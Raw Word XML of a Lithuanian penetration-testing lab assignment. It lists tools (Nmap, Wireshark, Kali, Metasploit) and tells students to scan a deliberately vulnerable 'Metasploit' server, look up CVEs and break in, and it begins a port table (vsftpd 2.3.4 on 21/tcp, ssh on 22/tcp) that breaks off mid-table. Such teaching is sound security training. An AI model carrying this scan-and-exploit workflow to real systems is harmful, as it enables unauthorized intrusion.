      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (arba Filehippo: </w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:instrText xml:space="preserve"> HYPERLINK "https:</w:instrText>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:instrText xml:space="preserve">//filehippo.com/download_vmware-workstation-player/" </w:instrText>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="001C123C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://filehippo.com/download_vmware-workstation-player/</w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D27E14" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Wireshark – tinklo srauto analizės programinė įranga;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B6F4D" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nmap (zemap) – tinklo paslaugų ir prievadų identifikavimo priemonė;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029B2FD" w14:textId="098A3AC9" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kali Linux –</w:t>
      </w:r>
      <w:r w:rsidR="008902B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>asitelkt</w:t>
      </w:r>
      <w:r w:rsidR="008902B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> „pentest“ Linux distribucij</w:t>
      </w:r>
      <w:r w:rsidR="008902B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tam, kad turėti visus reikiamus įrankius vienoje vietoje</w:t>
      </w:r>
      <w:r w:rsidR="008902B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FD5BA" w14:textId="3487231B" w:rsidR="00110871" w:rsidRPr="008902B0" w:rsidRDefault="00F1495C" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit – </w:t>
      </w:r>
      <w:r w:rsidR="00474658" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> testavimo sistema bei kartu platforma</w:t>
      </w:r>
      <w:r w:rsidR="007D090F" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (karkasas)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, skirta apsaugos priemonėms ir pažeidžiamumų išnaudojimo kodams kurti. Šią sistemą visame pasaulyje naudoja daugelis tinklo saugumo specialistų, atlikdami įsibrovimo testus, sistemų administratorių, tikrindami ar teisingai </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įdiegti</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sisteminiai atnaujinimai, </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>programinės</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įrangos</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naujinimai</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Sistema sukurta naudojant „Ruby“ programavimo kalbą, o išeinantys komponentai – įvairiomis kitomis kalbomis, pvz.: C, perl, assembler ir pan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD83DB" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EAB71B" w14:textId="0EC63265" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo atlikimo metodika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E33C6A" w14:textId="32A25F40" w:rsidR="005C441B" w:rsidRPr="008902B0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Darbo metu atliekamas tinklo skenavimas, aptinkami paslaugų prievadai (servises, ports), jų versijos. Versijų pažeidžiamumų paieška </w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:instrText xml:space="preserve"> HYPERLINK "http://nvd.nist.gov" </w:instrText>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>http://nvd.nist.gov</w:t>
      </w:r>
      <w:r w:rsidR="00B45BD6">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pažeidžiamumų duomenų bazėje. Pažeidžiamumų paieška Metasploit duomenų bazėje. Pažeidžiamumų išnaudojimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C6E6E" w14:textId="07A85648" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4068D" w14:textId="32EDB0A5" w:rsidR="005A6008" w:rsidRPr="00607DC0" w:rsidRDefault="00AA5BCE" w:rsidP="009E0593">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc258656089"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LABORATORINIO </w:t>
      </w:r>
      <w:r w:rsidR="005A6008" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DARBO ATASKAITOS DALIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCE597" w14:textId="42BCD183" w:rsidR="005A6008" w:rsidRPr="00607DC0" w:rsidRDefault="005A6008" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BE6F8C" w14:textId="77777777" w:rsidR="00AA5BCE" w:rsidRPr="00607DC0" w:rsidRDefault="00AA5BCE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288456CE" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc258656086"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo eiga. Skenavimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="78B0634C" w14:textId="214B2107" w:rsidR="009C5598" w:rsidRPr="00607DC0" w:rsidRDefault="009C5598" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuskenuoti „Metasploit“ serverio ip adresą. Gavus duomenis apie tinklą surašyti atidarytus portus surašyti į ataskaitą. Pasinaudojant nuskenuotomis paslaugomis įsilaužti į sistemą. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B06B35" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0DA141" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tinklo profilio lentelė yra būdas apjungti skenavimą ir dokumentų ruošimą, kad būtų apibrėžta apimtis, kurioje yra domenų pavadinimai, zonos perkėlimo detalės, svarbios pavadinimo serverio detalės ir tinklo strategija. Ši profilio lentelė tada naudojama kaip vadovas tikrinimo metu, papildoma, kai būtina, ir galiausiai pateikia apžvalgą galutinės ataskaitos skaitytojams ir sudarytojams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EFFBA7" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4596029F" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc258656087"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nmap naudojimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aptikti paslaugų pažeidžiamumai. Ieškoma CVE ir Metasploit duomenų bazėse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37041362" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32686D12" w14:textId="4C97BC3C" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugų sąrašas</w:t>
      </w:r>
      <w:r w:rsidR="004B1C5B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (skenuoto IP adreso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D168A" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3742"/>
        <w:gridCol w:w="2734"/>
        <w:gridCol w:w="3158"/>
      </w:tblGrid>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="1E7346D5" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BC6A584" w14:textId="47CED58F" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Prievadas</w:t>
            </w:r>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> (port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4EC89CAF" w14:textId="4EE91CE2" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Paslauga</w:t>
            </w:r>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> (service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="012FB65A" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="7212509C" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47710C55" w14:textId="0482E2E3" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="56F2EBA3" w14:textId="0DD3A8D6" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4046AAC6" w14:textId="3418C43A" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="7D646F11" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43AB52FA" w14:textId="28C1F434" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E9B26A6" w14:textId="445F9630" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="004558A7" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
